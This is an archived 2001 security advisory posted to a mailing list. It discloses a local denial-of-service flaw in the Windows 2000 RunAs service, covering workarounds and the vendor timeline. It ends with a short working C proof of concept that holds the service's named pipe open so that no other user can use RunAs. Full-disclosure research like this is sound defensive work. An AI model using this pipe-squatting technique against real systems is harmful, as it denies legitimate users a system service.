OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steve (stevesecuresolutions.org)
Date: Mon Nov 12 2001 - 20:28:35 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Team RADIX Research Report: RADIX1112200103

    Date Published: 11-12-2001
    Research Report ID: RADIX1112200103
    Bugtraq ID: 3291
    CVE CAN: N/A
    Title: Denial of Service Vulnerability in Windows 2000 RunAs Service
    Class: Denial of Service
    Remotely Exploitable: No
    Locally Exploitable: Yes

    Vulnerability Description:
    The Windows 2000 RunAs service allows a user to launch an application in
    a security context based upon a supplied set of credentials. The
    vulnerability discovered effectively disables the functionality of the
    RunAs services.

    Vulnerable Systems: Microsoft Windows 2000

    Solution/Vendor Information/Workaround:
    The vendor has decided to include the fix within service pack 3 (SP3).

    According to the vendor, "In February 2002, we will release Windows 2000
    Service Pack 3 (SP3)".

    http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.a
    sp

    When service pack 3 is released, Camisade recommends installing it.

    In the meantime, do not use the RunAs service. If the RunAs service is
    not used, a denial of service attack (as depicted here) will not have an
    impact on functionality. The denial of service attack depicted does not
    actually cause RunAs to shutdown, it only renders RunAs unusable.
    Therefore, this denial of service attack cannot be leveraged for the
    RADIX11122001 vulnerability that relies on RunAs being disabled.
    However, do not disable the RunAs service. The RADIX1112200101
    vulnerability can only be exploited if the RunAs service is not running.
    The malicious attacker is performing a man in the middle attack using a
    malicious RunAs service.

    Summary: Ensure the RunAs service is in it's default setting
    (automatically started and running). The default install of the service,
    unused and not set to manual (or disabled) is the safest method until
    service pack 3 is released. As a temporary solution, do not use any
    utilities that leverage the RunAs service. This includes the RunAs
    command line utility and Explorer's RunAs functionality.

    Vendor notified on: 09-10-2001

    The vendor was notified, and confirmed receipt, approximately two months
    ago. In keeping with the Camisade Research Report Policy, the
    information has been made public to best benefit the security community
    through full disclosure.

    Credits:
    Camisade - Team RADIX (researchcamisade.com) http://www.camisade.com

    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability Help Team. For more information or assistance drafting
    advisories please mail vulnhelpsecurityfocus.com.

    Technical Description - Proof of Concept Code:
    Architecturally, all communication with the RunAs service is done by
    means of the named pipe "\\.\pipe\secondarylogon". Additionally, the
    Windows 2000 API CreateProcessWithLogonW leverages this communications
    channel in an effort to launch a process with a supplied set of
    credentials.

    The RunAs service was implemented to provide service exclusively to one
    client per request. If more than one client requests service, from the
    RunAs service, simultaneously, the clients will receive the error "231:
    All pipe instances are busy".

    Consequently, it is possible for one client to simply connect to the
    pipe and never request any service. The RunAs service will wait for the
    client to either disconnect or send data and will not process any other
    requests until that happens.

    It is possible for the attack to occur remotely, however, because of the
    DACL associated with the pipe, the only users capable of this would be
    members of the Administrators group.

    Because of the aforementioned information, the most applicable context
    in which this vulnerability could be leveraged would be that of Windows
    2000 Terminal services.

    // radix1112200103.c - Camisade - Team RADIX - 11-12-2001
    //
    // Camisade (www.camisade.com) is not responsible for the use or //
    misuse of this proof of concept source code.

    #define WIN32_LEAN_AND_MEAN
    #define UNICODE
    #define _UNICODE

    #include <windows.h>
    #include <tchar.h>

    #include <stdio.h>
    #include <conio.h>

    #define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")

    void main()
    {
       HANDLE hPipe;

       hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0,
    OPEN_EXISTING, 0, 0);
       if (hPipe == INVALID_HANDLE_VALUE)
       {
          printf("Unable to open pipe, error %d\n", GetLastError());
          return;
       }

       printf("Connected to pipe. Press any key to disconnect.\n");
       getche();

       CloseHandle(hPipe);
    } 

    -- 
Team RADIX -- Camisade LLC
http://www.camisade.com
Application Security Innovations
Camisade Direct: 1.800.709.1241